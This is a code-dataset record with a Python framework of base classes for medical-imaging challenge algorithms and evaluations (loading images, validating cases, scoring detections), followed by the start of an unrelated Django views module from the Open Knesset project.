) -> DataFrame:
cases = None
for f in sorted(folder.glob("**/*"), key=self._file_sorter_key):
if file_filter is None or file_filter.match(str(f)):
try:
new_cases = file_loader.load(fname=f)
except FileLoaderError:
logger.warning(
f"Could not load {f.name} using {file_loader}."
)
else:
if cases is None:
cases = new_cases
else:
cases += new_cases
else:
logger.info(
f"Skip loading {f.name} because it doesn't match {file_filter}."
)
if cases is None:
raise FileLoaderError(
f"Could not load any files in {folder} with " f"{file_loader}."
)
return DataFrame(cases)
def validate(self):
""" Validates each dataframe for each fileloader separately """
file_loaders_keys = [k for k in self._file_loaders.keys()]
for key in self._validators.keys():
if key not in file_loaders_keys:
raise ValueError(
f"There is no file_loader associated with: {key}.\n"
f"Valid file loaders are: {file_loaders_keys}"
)
for key, cases in self._cases.items():
if key in self._validators:
self._validate_data_frame(df=cases, file_loader_key=key)
def _validate_data_frame(self, *, df: DataFrame, file_loader_key: str):
for validator in self._validators[file_loader_key]:
validator.validate(df=df)
def process(self):
self.load()
self.validate()
self.process_cases()
self.save()
def process_cases(self, file_loader_key: str = None):
if file_loader_key is None:
file_loader_key = self._index_key
self._case_results = []
for idx, case in self._cases[file_loader_key].iterrows():
self._case_results.append(self.process_case(idx=idx, case=case))
@abstractmethod
def process_case(self, *, idx: int, case: DataFrame) -> Dict:
raise NotImplementedError()
def save(self):
with open(str(self._output_file), "w") as f:
json.dump(self._case_results, f)
def _load_input_image(self, *, case) -> Tuple[SimpleITK.Image, Path]:
input_image_file_path = case["path"]
input_image_file_loader = self._file_loaders["input_image"]
if not isinstance(input_image_file_loader, ImageLoader):
raise RuntimeError(
"The used FileLoader was not of subclass ImageLoader"
)
# Load the image for this case
input_image = input_image_file_loader.load_image(input_image_file_path)
# Check that it is the expected image
if input_image_file_loader.hash_image(input_image) != case["hash"]:
raise RuntimeError("Image hashes do not match")
return input_image, input_image_file_path
@abstractmethod
def predict(self, *, input_image: SimpleITK.Image) -> Any:
raise NotImplementedError()
class DetectionAlgorithm(Algorithm):
def process_case(self, *, idx, case):
# Load and test the image for this case
input_image, input_image_file_path = self._load_input_image(case=case)
# Detect and score candidates
scored_candidates = self.predict(input_image=input_image)
# Write resulting candidates to result.json for this case
return {
"outputs": [
dict(type="candidates", data=scored_candidates.to_dict())
],
"inputs": [
dict(type="metaio_image", filename=input_image_file_path.name)
],
"error_messages": [],
}
@abstractmethod
def predict(self, *, input_image: SimpleITK.Image) -> DataFrame:
raise NotImplementedError()
@staticmethod
def _serialize_candidates(
*,
candidates: Iterable[Tuple[float, ...]],
candidate_scores: List[Any],
ref_image: SimpleITK.Image,
) -> List[Dict]:
data = []
for coord, score in zip(candidates, candidate_scores):
world_coords = ref_image.TransformContinuousIndexToPhysicalPoint(
[c for c in reversed(coord)]
)
coord_data = {
f"coord{k}": v for k, v in zip(["X", "Y", "Z"], world_coords)
}
coord_data.update({"score": score})
data.append(coord_data)
return data
class SegmentationAlgorithm(Algorithm):
def process_case(self, *, idx, case):
# Load and test the image for this case
input_image, input_image_file_path = self._load_input_image(case=case)
# Segment nodule candidates
segmented_nodules = self.predict(input_image=input_image)
# Write resulting segmentation to output location
segmentation_path = self._output_path / input_image_file_path.name
if not self._output_path.exists():
self._output_path.mkdir()
SimpleITK.WriteImage(segmented_nodules, str(segmentation_path), True)
# Write segmentation file path to result.json for this case
return {
"outputs": [
dict(type="metaio_image", filename=segmentation_path.name)
],
"inputs": [
dict(type="metaio_image", filename=input_image_file_path.name)
],
"error_messages": [],
}
@abstractmethod
def predict(self, *, input_image: SimpleITK.Image) -> SimpleITK.Image:
raise NotImplementedError()
class ClassificationAlgorithm(Algorithm):
def process_case(self, *, idx, case):
# Load and test the image for this case
input_image, input_image_file_path = self._load_input_image(case=case)
# Classify input_image image
results = self.predict(input_image=input_image)
# Test classification output
if not isinstance(results, dict):
raise ValueError("Exepected a dictionary as output")
# Write resulting classification to result.json for this case
return {
"outputs": [results],
"inputs": [
dict(type="metaio_image", filename=input_image_file_path.name)
],
"error_messages": [],
}
@abstractmethod
def predict(self, *, input_image: SimpleITK.Image) -> Dict:
raise NotImplementedError()
class BaseEvaluation(ABC):
def __init__(
self,
*,
ground_truth_path: Path = DEFAULT_GROUND_TRUTH_PATH,
predictions_path: Path = DEFAULT_INPUT_PATH,
file_sorter_key: Callable = first_int_in_filename_key,
file_loader: FileLoader,
validators: Tuple[DataFrameValidator, ...],
join_key: str = None,
aggregates: Set[str] = None,
output_file: PathLike = DEFAULT_EVALUATION_OUTPUT_FILE_PATH,
):
"""
The base class for all evaluations. Sets the environment and controls
the flow of the evaluation once `evaluate` is called.
Parameters
----------
ground_truth_path
The path in the container where the ground truth will be loaded
from
predictions_path
The path in the container where the submission will be loaded from
file_sorter_key
A function that determines how files are sorted and matched
together
file_loader
The loader that will be used to get all files
validators
A tuple containing all the validators that will be used on the
loaded data
join_key
The column that will be used to join the predictions and ground
truth tables
aggregates
The set of aggregates that will be calculated by
`pandas.DataFrame.describe`
output_file
The path to the location where the results will be written
"""
if aggregates is None:
aggregates = {
"mean",
"std",
"min",
"max",
"25%",
"50%",
"75%",
"count",
"uniq",
"freq",
}
self._ground_truth_path = ground_truth_path
self._predictions_path = predictions_path
self._file_sorter_key = file_sorter_key
self._file_loader = file_loader
self._validators = validators
self._join_key = join_key
self._aggregates = aggregates
self._output_file = output_file
self._ground_truth_cases = DataFrame()
self._predictions_cases = DataFrame()
self._cases = DataFrame()
self._case_results = DataFrame()
self._aggregate_results: Dict[str, Union[float, int, str, None]] = {}
super().__init__()
if isinstance(self._file_loader, CSVLoader) and self._join_key is None:
raise ConfigurationError(
f"You must set a `join_key` when using {self._file_loader}."
)
@property
def _metrics(self) -> Dict:
""" Returns the calculated case and aggregate results """
return {
"case": self._case_results.to_dict(),
"aggregates": self._aggregate_results,
}
def evaluate(self):
self.load()
self.validate()
self.merge_ground_truth_and_predictions()
self.cross_validate()
self.score()
self.save()
def load(self):
self._ground_truth_cases = self._load_cases(
folder=self._ground_truth_path
)
self._predictions_cases = self._load_cases(
folder=self._predictions_path
)
def _load_cases(self, *, folder: Path) -> DataFrame:
cases = None
for f in sorted(folder.glob("**/*"), key=self._file_sorter_key):
try:
new_cases = self._file_loader.load(fname=f)
except FileLoaderError:
logger.warning(
f"Could not load {f.name} using {self._file_loader}."
)
else:
if cases is None:
cases = new_cases
else:
cases += new_cases
if cases is None:
raise FileLoaderError(
f"Could not load any files in {folder} with "
f"{self._file_loader}."
)
return DataFrame(cases)
def validate(self):
""" Validates each dataframe separately """
self._validate_data_frame(df=self._ground_truth_cases)
self._validate_data_frame(df=self._predictions_cases)
def _validate_data_frame(self, *, df: DataFrame):
for validator in self._validators:
validator.validate(df=df)
@abstractmethod
def merge_ground_truth_and_predictions(self):
pass
@abstractmethod
def cross_validate(self):
""" Validates both dataframes """
pass
def _raise_missing_predictions_error(self, *, missing=None):
if missing is not None:
message = (
"Predictions missing: you did not submit predictions for "
f"{missing}. Please try again."
)
else:
message = (
"Predictions missing: you did not submit enough predictions, "
"please try again."
)
raise ValidationError(message)
def _raise_extra_predictions_error(self, *, extra=None):
if extra is not None:
message = (
"Too many predictions: we do not have the ground truth data "
f"for {extra}. Please try again."
)
else:
message = (
"Too many predictions: you submitted too many predictions, "
"please try again."
)
raise ValidationError(message)
@abstractmethod
def score(self):
pass
# noinspection PyUnusedLocal
def score_case(self, *, idx: int, case: DataFrame) -> Dict:
return {}
def score_aggregates(self) -> Dict:
aggregate_results = {}
for col in self._case_results.columns:
aggregate_results[col] = self.aggregate_series(
series=self._case_results[col]
)
return aggregate_results
def aggregate_series(self, *, series: Series) -> Dict:
summary = series.describe()
valid_keys = [a for a in self._aggregates if a in summary]
series_summary = {}
for k in valid_keys:
value = summary[k]
# % in keys could cause problems when looking up values later
key = k.replace("%", "pc")
try:
json.dumps(value)
except TypeError:
logger.warning(
f"Could not serialize {key}: {value} as json, "
f"so converting {value} to int."
)
value = int(value)
series_summary[key] = value
return series_summary
def save(self):
with open(self._output_file, "w") as f:
f.write(json.dumps(self._metrics))
class ClassificationEvaluation(BaseEvaluation):
"""
ClassificationEvaluations have the same number of predictions as the
number of ground truth cases. These can be things like, what is the
stage of this case, or segment some things in this case.
"""
def merge_ground_truth_and_predictions(self):
if self._join_key:
kwargs = {"on": self._join_key}
else:
kwargs = {"left_index": True, "right_index": True}
self._cases = merge(
left=self._ground_truth_cases,
right=self._predictions_cases,
indicator=True,
how="outer",
suffixes=("_ground_truth", "_prediction"),
**kwargs,
)
def cross_validate(self):
missing = [
p for _, p in self._cases.iterrows() if p["_merge"] == "left_only"
]
if missing:
if self._join_key:
missing = [p[self._join_key] for p in missing]
self._raise_missing_predictions_error(missing=missing)
extra = [
p for _, p in self._cases.iterrows() if p["_merge"] == "right_only"
]
if extra:
if self._join_key:
extra = [p[self._join_key] for p in extra]
self._raise_extra_predictions_error(extra=extra)
def score(self):
self._case_results = DataFrame()
for idx, case in self._cases.iterrows():
self._case_results = self._case_results.append(
self.score_case(idx=idx, case=case), ignore_index=True
)
self._aggregate_results = self.score_aggregates()
class Evaluation(ClassificationEvaluation):
"""
Legacy class, you should use ClassificationEvaluation instead.
"""
def __init__(self, *args, **kwargs):
warn(
(
"The Evaluation class is deprecated, "
"please use ClassificationEvaluation instead"
),
DeprecationWarning,
)
super().__init__(*args, **kwargs)
class DetectionEvaluation(BaseEvaluation):
"""
DetectionEvaluations have a different number of predictions from the
number of ground truth annotations. An example would be detecting lung
nodules in a CT volume, or malignant cells in a pathology slide.
"""
def __init__(self, *args, detection_radius, detection_threshold, **kwargs):
super().__init__(*args, **kwargs)
self._detection_radius = detection_radius
self._detection_threshold = detection_threshold
def merge_ground_truth_and_predictions(self):
self._cases = concat(
[self._ground_truth_cases, self._predictions_cases],
keys=["ground_truth", "predictions"],
)
def cross_validate(self):
expected_keys = set(self._ground_truth_cases[self._join_key])
submitted_keys = set(self._predictions_cases[self._join_key])
missing = expected_keys - submitted_keys
if missing:
self._raise_missing_predictions_error(missing=missing)
extra = submitted_keys - expected_keys
if extra:
self._raise_extra_predictions_error(extra=extra)
def _raise_extra_predictions_error(self, *, extra=None):
""" In detection challenges extra predictions are ok """
warn(f"There are extra predictions for cases: {extra}.")
def _raise_missing_predictions_error(self, *, missing=None):
""" In detection challenges missing predictions are ok """
warn(f"Could not find predictions for cases: {missing}.")
def score(self):
cases = set(self._ground_truth_cases[self._join_key])
cases |= set(self._predictions_cases[self._join_key])
self._case_results = DataFrame()
for idx, case in enumerate(cases):
self._case_results = self._case_results.append(
self.score_case(
idx=idx,
case=self._cases.loc[self._cases[self._join_key] == case],
),
ignore_index=True,
)
self._aggregate_results = self.score_aggregates()
def score_case(self, *, idx, case):
score = score_detection(
ground_truth=self.get_points(case=case, key="ground_truth"),
predictions=self.get_points(case=case, key="predictions"),
radius=self._detection_radius,
)
# Add the case id to the score
output = score._asdict()
output.update({self._join_key: case[self._join_key][0]})
return output
def get_points(
self, *, case, key: str
) -> List[Tuple[Union[int, float], Union[int, float]]]:
raise NotImplementedError
def score_aggregates(self):
aggregate_results = super().score_aggregates()
totals = self._case_results.sum()
for s in totals.index:
aggregate_results[s]["sum"] = totals[s]
tp = aggregate_results["true_positives"]["sum"]
fp = aggregate_results["false_positives"]["sum"]
fn = aggregate_results["false_negatives"]["sum"]
aggregate_results["precision"] = tp / (tp + fp)
aggregate_results["recall"] = tp / (tp + fn)
aggregate_results["f1_score"] = 2 * tp / ((2 * tp) + fp + fn)
return aggregate_results
| 33.142857 | 84 | 0.597759 | import json
import logging
from abc import ABC, abstractmethod
from os import PathLike
from pathlib import Path
from typing import (
Any,
Callable,
Dict,
Iterable,
List,
Optional,
Pattern,
Set,
Tuple,
Union,
)
from warnings import warn
import SimpleITK
from pandas import DataFrame, Series, concat, merge
from .exceptions import ConfigurationError, FileLoaderError, ValidationError
from .io import (
CSVLoader,
FileLoader,
ImageLoader,
SimpleITKLoader,
first_int_in_filename_key,
)
from .scorers import score_detection
from .validators import DataFrameValidator, UniqueImagesValidator
logger = logging.getLogger(__name__)
DEFAULT_INPUT_PATH = Path("/input/")
DEFAULT_ALGORITHM_OUTPUT_IMAGES_PATH = Path("/output/images/")
DEFAULT_ALGORITHM_OUTPUT_FILE_PATH = Path("/output/results.json")
DEFAULT_GROUND_TRUTH_PATH = Path("/opt/evaluation/ground-truth/")
DEFAULT_EVALUATION_OUTPUT_FILE_PATH = Path("/output/metrics.json")
class Algorithm(ABC):
def __init__(
self,
*,
index_key: str = "input_image",
file_loaders: Optional[Dict[str, FileLoader]] = None,
file_filters: Optional[Dict[str, Optional[Pattern[str]]]] = None,
input_path: Path = DEFAULT_INPUT_PATH,
output_path: Path = DEFAULT_ALGORITHM_OUTPUT_IMAGES_PATH,
file_sorter_key: Optional[Callable] = None,
validators: Optional[Dict[str, Tuple[DataFrameValidator, ...]]] = None,
output_file: PathLike = DEFAULT_ALGORITHM_OUTPUT_FILE_PATH,
):
self._index_key = index_key
self._input_path = input_path
self._output_path = output_path
self._file_sorter_key = file_sorter_key
self._output_file = output_file
self._ground_truth_cases = DataFrame()
self._predictions_cases = DataFrame()
self._cases: Dict[str, DataFrame] = {}
self._case_results: List[Dict] = []
self._validators: Dict[str, Tuple[DataFrameValidator, ...]] = (
dict(input_image=(UniqueImagesValidator(),))
if validators is None
else validators
)
self._file_loaders: Dict[str, FileLoader] = (
dict(input_image=SimpleITKLoader())
if file_loaders is None
else file_loaders
)
self._file_filters: Dict[str, Optional[Pattern[str]]] = (
dict(input_image=None) if file_filters is None else file_filters
)
super().__init__()
def load(self):
for key, file_loader in self._file_loaders.items():
fltr = (
self._file_filters[key] if key in self._file_filters else None
)
self._cases[key] = self._load_cases(
folder=self._input_path,
file_loader=file_loader,
file_filter=fltr,
)
def _load_cases(
self,
*,
folder: Path,
file_loader: ImageLoader,
file_filter: Pattern[str] = None,
) -> DataFrame:
cases = None
for f in sorted(folder.glob("**/*"), key=self._file_sorter_key):
if file_filter is None or file_filter.match(str(f)):
try:
new_cases = file_loader.load(fname=f)
except FileLoaderError:
logger.warning(
f"Could not load {f.name} using {file_loader}."
)
else:
if cases is None:
cases = new_cases
else:
cases += new_cases
else:
logger.info(
f"Skip loading {f.name} because it doesn't match {file_filter}."
)
if cases is None:
raise FileLoaderError(
f"Could not load any files in {folder} with " f"{file_loader}."
)
return DataFrame(cases)
def validate(self):
file_loaders_keys = [k for k in self._file_loaders.keys()]
for key in self._validators.keys():
if key not in file_loaders_keys:
raise ValueError(
f"There is no file_loader associated with: {key}.\n"
f"Valid file loaders are: {file_loaders_keys}"
)
for key, cases in self._cases.items():
if key in self._validators:
self._validate_data_frame(df=cases, file_loader_key=key)
def _validate_data_frame(self, *, df: DataFrame, file_loader_key: str):
for validator in self._validators[file_loader_key]:
validator.validate(df=df)
def process(self):
self.load()
self.validate()
self.process_cases()
self.save()
def process_cases(self, file_loader_key: str = None):
if file_loader_key is None:
file_loader_key = self._index_key
self._case_results = []
for idx, case in self._cases[file_loader_key].iterrows():
self._case_results.append(self.process_case(idx=idx, case=case))
@abstractmethod
def process_case(self, *, idx: int, case: DataFrame) -> Dict:
raise NotImplementedError()
def save(self):
with open(str(self._output_file), "w") as f:
json.dump(self._case_results, f)
def _load_input_image(self, *, case) -> Tuple[SimpleITK.Image, Path]:
input_image_file_path = case["path"]
input_image_file_loader = self._file_loaders["input_image"]
if not isinstance(input_image_file_loader, ImageLoader):
raise RuntimeError(
"The used FileLoader was not of subclass ImageLoader"
)
# Load the image for this case
input_image = input_image_file_loader.load_image(input_image_file_path)
# Check that it is the expected image
if input_image_file_loader.hash_image(input_image) != case["hash"]:
raise RuntimeError("Image hashes do not match")
return input_image, input_image_file_path
@abstractmethod
def predict(self, *, input_image: SimpleITK.Image) -> Any:
raise NotImplementedError()
class DetectionAlgorithm(Algorithm):
def process_case(self, *, idx, case):
# Load and test the image for this case
input_image, input_image_file_path = self._load_input_image(case=case)
# Detect and score candidates
scored_candidates = self.predict(input_image=input_image)
# Write resulting candidates to result.json for this case
return {
"outputs": [
dict(type="candidates", data=scored_candidates.to_dict())
],
"inputs": [
dict(type="metaio_image", filename=input_image_file_path.name)
],
"error_messages": [],
}
@abstractmethod
def predict(self, *, input_image: SimpleITK.Image) -> DataFrame:
raise NotImplementedError()
@staticmethod
def _serialize_candidates(
*,
candidates: Iterable[Tuple[float, ...]],
candidate_scores: List[Any],
ref_image: SimpleITK.Image,
) -> List[Dict]:
data = []
for coord, score in zip(candidates, candidate_scores):
world_coords = ref_image.TransformContinuousIndexToPhysicalPoint(
[c for c in reversed(coord)]
)
coord_data = {
f"coord{k}": v for k, v in zip(["X", "Y", "Z"], world_coords)
}
coord_data.update({"score": score})
data.append(coord_data)
return data
class SegmentationAlgorithm(Algorithm):
def process_case(self, *, idx, case):
# Load and test the image for this case
input_image, input_image_file_path = self._load_input_image(case=case)
# Segment nodule candidates
segmented_nodules = self.predict(input_image=input_image)
# Write resulting segmentation to output location
segmentation_path = self._output_path / input_image_file_path.name
if not self._output_path.exists():
self._output_path.mkdir()
SimpleITK.WriteImage(segmented_nodules, str(segmentation_path), True)
# Write segmentation file path to result.json for this case
return {
"outputs": [
dict(type="metaio_image", filename=segmentation_path.name)
],
"inputs": [
dict(type="metaio_image", filename=input_image_file_path.name)
],
"error_messages": [],
}
@abstractmethod
def predict(self, *, input_image: SimpleITK.Image) -> SimpleITK.Image:
raise NotImplementedError()
class ClassificationAlgorithm(Algorithm):
def process_case(self, *, idx, case):
# Load and test the image for this case
input_image, input_image_file_path = self._load_input_image(case=case)
# Classify input_image image
results = self.predict(input_image=input_image)
# Test classification output
if not isinstance(results, dict):
raise ValueError("Exepected a dictionary as output")
# Write resulting classification to result.json for this case
return {
"outputs": [results],
"inputs": [
dict(type="metaio_image", filename=input_image_file_path.name)
],
"error_messages": [],
}
@abstractmethod
def predict(self, *, input_image: SimpleITK.Image) -> Dict:
raise NotImplementedError()
class BaseEvaluation(ABC):
def __init__(
self,
*,
ground_truth_path: Path = DEFAULT_GROUND_TRUTH_PATH,
predictions_path: Path = DEFAULT_INPUT_PATH,
file_sorter_key: Callable = first_int_in_filename_key,
file_loader: FileLoader,
validators: Tuple[DataFrameValidator, ...],
join_key: str = None,
aggregates: Set[str] = None,
output_file: PathLike = DEFAULT_EVALUATION_OUTPUT_FILE_PATH,
):
if aggregates is None:
aggregates = {
"mean",
"std",
"min",
"max",
"25%",
"50%",
"75%",
"count",
"uniq",
"freq",
}
self._ground_truth_path = ground_truth_path
self._predictions_path = predictions_path
self._file_sorter_key = file_sorter_key
self._file_loader = file_loader
self._validators = validators
self._join_key = join_key
self._aggregates = aggregates
self._output_file = output_file
self._ground_truth_cases = DataFrame()
self._predictions_cases = DataFrame()
self._cases = DataFrame()
self._case_results = DataFrame()
self._aggregate_results: Dict[str, Union[float, int, str, None]] = {}
super().__init__()
if isinstance(self._file_loader, CSVLoader) and self._join_key is None:
raise ConfigurationError(
f"You must set a `join_key` when using {self._file_loader}."
)
@property
def _metrics(self) -> Dict:
return {
"case": self._case_results.to_dict(),
"aggregates": self._aggregate_results,
}
def evaluate(self):
self.load()
self.validate()
self.merge_ground_truth_and_predictions()
self.cross_validate()
self.score()
self.save()
def load(self):
self._ground_truth_cases = self._load_cases(
folder=self._ground_truth_path
)
self._predictions_cases = self._load_cases(
folder=self._predictions_path
)
def _load_cases(self, *, folder: Path) -> DataFrame:
cases = None
for f in sorted(folder.glob("**/*"), key=self._file_sorter_key):
try:
new_cases = self._file_loader.load(fname=f)
except FileLoaderError:
logger.warning(
f"Could not load {f.name} using {self._file_loader}."
)
else:
if cases is None:
cases = new_cases
else:
cases += new_cases
if cases is None:
raise FileLoaderError(
f"Could not load any files in {folder} with "
f"{self._file_loader}."
)
return DataFrame(cases)
def validate(self):
self._validate_data_frame(df=self._ground_truth_cases)
self._validate_data_frame(df=self._predictions_cases)
def _validate_data_frame(self, *, df: DataFrame):
for validator in self._validators:
validator.validate(df=df)
@abstractmethod
def merge_ground_truth_and_predictions(self):
pass
@abstractmethod
def cross_validate(self):
pass
def _raise_missing_predictions_error(self, *, missing=None):
if missing is not None:
message = (
"Predictions missing: you did not submit predictions for "
f"{missing}. Please try again."
)
else:
message = (
"Predictions missing: you did not submit enough predictions, "
"please try again."
)
raise ValidationError(message)
def _raise_extra_predictions_error(self, *, extra=None):
if extra is not None:
message = (
"Too many predictions: we do not have the ground truth data "
f"for {extra}. Please try again."
)
else:
message = (
"Too many predictions: you submitted too many predictions, "
"please try again."
)
raise ValidationError(message)
@abstractmethod
def score(self):
pass
# noinspection PyUnusedLocal
def score_case(self, *, idx: int, case: DataFrame) -> Dict:
return {}
def score_aggregates(self) -> Dict:
aggregate_results = {}
for col in self._case_results.columns:
aggregate_results[col] = self.aggregate_series(
series=self._case_results[col]
)
return aggregate_results
def aggregate_series(self, *, series: Series) -> Dict:
summary = series.describe()
valid_keys = [a for a in self._aggregates if a in summary]
series_summary = {}
for k in valid_keys:
value = summary[k]
# % in keys could cause problems when looking up values later
key = k.replace("%", "pc")
try:
json.dumps(value)
except TypeError:
logger.warning(
f"Could not serialize {key}: {value} as json, "
f"so converting {value} to int."
)
value = int(value)
series_summary[key] = value
return series_summary
def save(self):
with open(self._output_file, "w") as f:
f.write(json.dumps(self._metrics))
class ClassificationEvaluation(BaseEvaluation):
def merge_ground_truth_and_predictions(self):
if self._join_key:
kwargs = {"on": self._join_key}
else:
kwargs = {"left_index": True, "right_index": True}
self._cases = merge(
left=self._ground_truth_cases,
right=self._predictions_cases,
indicator=True,
how="outer",
suffixes=("_ground_truth", "_prediction"),
**kwargs,
)
def cross_validate(self):
missing = [
p for _, p in self._cases.iterrows() if p["_merge"] == "left_only"
]
if missing:
if self._join_key:
missing = [p[self._join_key] for p in missing]
self._raise_missing_predictions_error(missing=missing)
extra = [
p for _, p in self._cases.iterrows() if p["_merge"] == "right_only"
]
if extra:
if self._join_key:
extra = [p[self._join_key] for p in extra]
self._raise_extra_predictions_error(extra=extra)
def score(self):
self._case_results = DataFrame()
for idx, case in self._cases.iterrows():
self._case_results = self._case_results.append(
self.score_case(idx=idx, case=case), ignore_index=True
)
self._aggregate_results = self.score_aggregates()
class Evaluation(ClassificationEvaluation):
def __init__(self, *args, **kwargs):
warn(
(
"The Evaluation class is deprecated, "
"please use ClassificationEvaluation instead"
),
DeprecationWarning,
)
super().__init__(*args, **kwargs)
class DetectionEvaluation(BaseEvaluation):
def __init__(self, *args, detection_radius, detection_threshold, **kwargs):
super().__init__(*args, **kwargs)
self._detection_radius = detection_radius
self._detection_threshold = detection_threshold
def merge_ground_truth_and_predictions(self):
self._cases = concat(
[self._ground_truth_cases, self._predictions_cases],
keys=["ground_truth", "predictions"],
)
def cross_validate(self):
expected_keys = set(self._ground_truth_cases[self._join_key])
submitted_keys = set(self._predictions_cases[self._join_key])
missing = expected_keys - submitted_keys
if missing:
self._raise_missing_predictions_error(missing=missing)
extra = submitted_keys - expected_keys
if extra:
self._raise_extra_predictions_error(extra=extra)
def _raise_extra_predictions_error(self, *, extra=None):
warn(f"There are extra predictions for cases: {extra}.")
def _raise_missing_predictions_error(self, *, missing=None):
warn(f"Could not find predictions for cases: {missing}.")
def score(self):
cases = set(self._ground_truth_cases[self._join_key])
cases |= set(self._predictions_cases[self._join_key])
self._case_results = DataFrame()
for idx, case in enumerate(cases):
self._case_results = self._case_results.append(
self.score_case(
idx=idx,
case=self._cases.loc[self._cases[self._join_key] == case],
),
ignore_index=True,
)
self._aggregate_results = self.score_aggregates()
def score_case(self, *, idx, case):
score = score_detection(
ground_truth=self.get_points(case=case, key="ground_truth"),
predictions=self.get_points(case=case, key="predictions"),
radius=self._detection_radius,
)
# Add the case id to the score
output = score._asdict()
output.update({self._join_key: case[self._join_key][0]})
return output
def get_points(
self, *, case, key: str
) -> List[Tuple[Union[int, float], Union[int, float]]]:
raise NotImplementedError
def score_aggregates(self):
aggregate_results = super().score_aggregates()
totals = self._case_results.sum()
for s in totals.index:
aggregate_results[s]["sum"] = totals[s]
tp = aggregate_results["true_positives"]["sum"]
fp = aggregate_results["false_positives"]["sum"]
fn = aggregate_results["false_negatives"]["sum"]
aggregate_results["precision"] = tp / (tp + fp)
aggregate_results["recall"] = tp / (tp + fn)
aggregate_results["f1_score"] = 2 * tp / ((2 * tp) + fp + fn)
return aggregate_results
| true | true |
f7fa40ec5aa438fecbe7602876ea17b732a736ff | 23,891 | py | Python | auxiliary/views.py | Tudmotu/Open-Knesset | 005adff8422ad34af8f78b0f32e7052b65a5bad3 | [
"BSD-3-Clause"
] | 1 | 2018-12-11T01:43:25.000Z | 2018-12-11T01:43:25.000Z | auxiliary/views.py | Tudmotu/Open-Knesset | 005adff8422ad34af8f78b0f32e7052b65a5bad3 | [
"BSD-3-Clause"
] | null | null | null | auxiliary/views.py | Tudmotu/Open-Knesset | 005adff8422ad34af8f78b0f32e7052b65a5bad3 | [
"BSD-3-Clause"
] | null | null | null | import csv, random, tagging, logging
from actstream import action
from annotatetext.views import post_annotation as annotatetext_post_annotation
from django.conf import settings
from django.contrib.auth.decorators import login_required, permission_required
from django.contrib.comments.models import Comment
from django.contrib.contenttypes.models import ContentType
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.http import (
HttpResponseForbidden, HttpResponseRedirect, HttpResponse,
HttpResponseNotAllowed, HttpResponseBadRequest, Http404, HttpResponsePermanentRedirect)
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from django.utils import simplejson as json
from django.utils.translation import ugettext as _
from django.views.generic import TemplateView, DetailView, ListView
from django.views.generic.list import BaseListView
from django.views.decorators.http import require_http_methods
from tagging.models import Tag, TaggedItem
from .forms import TidbitSuggestionForm, FeedbackSuggestionForm, TagSuggestionForm
from .models import Tidbit, TagSuggestion
from committees.models import CommitteeMeeting
from events.models import Event
from knesset.utils import notify_responsible_adult
from laws.models import Vote, Bill
from mks.models import Member, Knesset
from tagging.utils import get_tag
from auxiliary.models import TagSynonym
class BaseTagMemberListView(ListView):
"""Generic helper for common tagged objects and optionally member
operations. Shoud be inherited by others"""
url_to_reverse = None # override in inherited for reversing tag_url
# in context
@property
def tag_instance(self):
if not hasattr(self, '_tag_instance'):
tag = self.kwargs['tag']
self._tag_instance = get_tag(tag)
if self._tag_instance is None:
raise Http404(_('No Tag found matching "%s".') % tag)
return self._tag_instance
@property
def member(self):
if not hasattr(self, '_member'):
member_id = self.request.GET.get('member', False)
if member_id:
try:
member_id = int(member_id)
except ValueError:
raise Http404(
_('No Member found matching "%s".') % member_id)
self._member = get_object_or_404(Member, pk=member_id)
else:
self._member = None
return self._member
def get_context_data(self, *args, **kwargs):
context = super(BaseTagMemberListView, self).get_context_data(
*args, **kwargs)
context['tag'] = self.tag_instance
context['tag_url'] = reverse(self.url_to_reverse,
args=[self.tag_instance])
if self.member:
context['member'] = self.member
context['member_url'] = reverse(
'member-detail', args=[self.member.pk])
user = self.request.user
if user.is_authenticated():
context['watched_members'] = user.get_profile().members
else:
context['watched_members'] = False
return context
logger = logging.getLogger("open-knesset.auxiliary.views")
def help_page(request):
context = cache.get('help_page_context')
if not context:
context = {}
context['title'] = _('Help')
context['member'] = Member.current_knesset.all()[random.randrange(Member.current_knesset.count())]
votes = Vote.objects.filter_and_order(order='controversy')
context['vote'] = votes[random.randrange(votes.count())]
context['bill'] = Bill.objects.all()[random.randrange(Bill.objects.count())]
tags_cloud = cache.get('tags_cloud', None)
if not tags_cloud:
tags_cloud = calculate_cloud_from_models(Vote,Bill,CommitteeMeeting)
tags_cloud.sort(key=lambda x:x.name)
cache.set('tags_cloud', tags_cloud, settings.LONG_CACHE_TIME)
context['tags'] = random.sample(tags_cloud,
min(len(tags_cloud),8)
) if tags_cloud else None
context['has_search'] = False # enable the base template search
cache.set('help_page_context', context, 300) # 5 Minutes
template_name = '%s.%s%s' % ('help_page', settings.LANGUAGE_CODE, '.html')
return render_to_response(template_name, context, context_instance=RequestContext(request))
def add_previous_comments(comments):
previous_comments = set()
for c in comments:
c.previous_comments = Comment.objects.filter(
object_pk=c.object_pk,
content_type=c.content_type,
submit_date__lt=c.submit_date).select_related('user')
previous_comments.update(c.previous_comments)
c.is_comment = True
comments = [c for c in comments if c not in previous_comments]
return comments
def get_annotations(comments, annotations):
for a in annotations:
a.submit_date = a.timestamp
comments = add_previous_comments(comments)
annotations.extend(comments)
annotations.sort(key=lambda x:x.submit_date,reverse=True)
return annotations
def main(request):
"""
Note on annotations:
Old:
Return annotations by concatenating Annotation last 10 and Comment last
10, adding all related comments (comments on same item that are older).
annotations_old = get_annotations(
annotations=list(Annotation.objects.all().order_by('-timestamp')[:10]),
comments=Comment.objects.all().order_by('-submit_date')[:10])
New:
Return annotations by Action filtered to include only:
annotation-added (to meeting), ignore annotated (by user)
comment-added
"""
#context = cache.get('main_page_context')
#if not context:
# context = {
# 'title': _('Home'),
# 'hide_crumbs': True,
# }
# actions = list(main_actions()[:10])
#
# annotations = get_annotations(
# annotations=[a.target for a in actions if a.verb != 'comment-added'],
# comments=[x.target for x in actions if x.verb == 'comment-added'])
# context['annotations'] = annotations
# b = get_debated_bills()
# if b:
# context['bill'] = get_debated_bills()[0]
# else:
# context['bill'] = None
# public_agenda_ids = Agenda.objects.filter(is_public=True
# ).values_list('id',flat=True)
# if len(public_agenda_ids) > 0:
# context['agenda_id'] = random.choice(public_agenda_ids)
# context['topics'] = Topic.objects.filter(status__in=PUBLIC_TOPIC_STATUS)\
# .order_by('-modified')\
# .select_related('creator')[:10]
# cache.set('main_page_context', context, 300) # 5 Minutes
# did we post the TidbitSuggest form ?
if request.method == 'POST':
# only logged-in users can suggest
if not request.user.is_authenticated:
return HttpResponseForbidden()
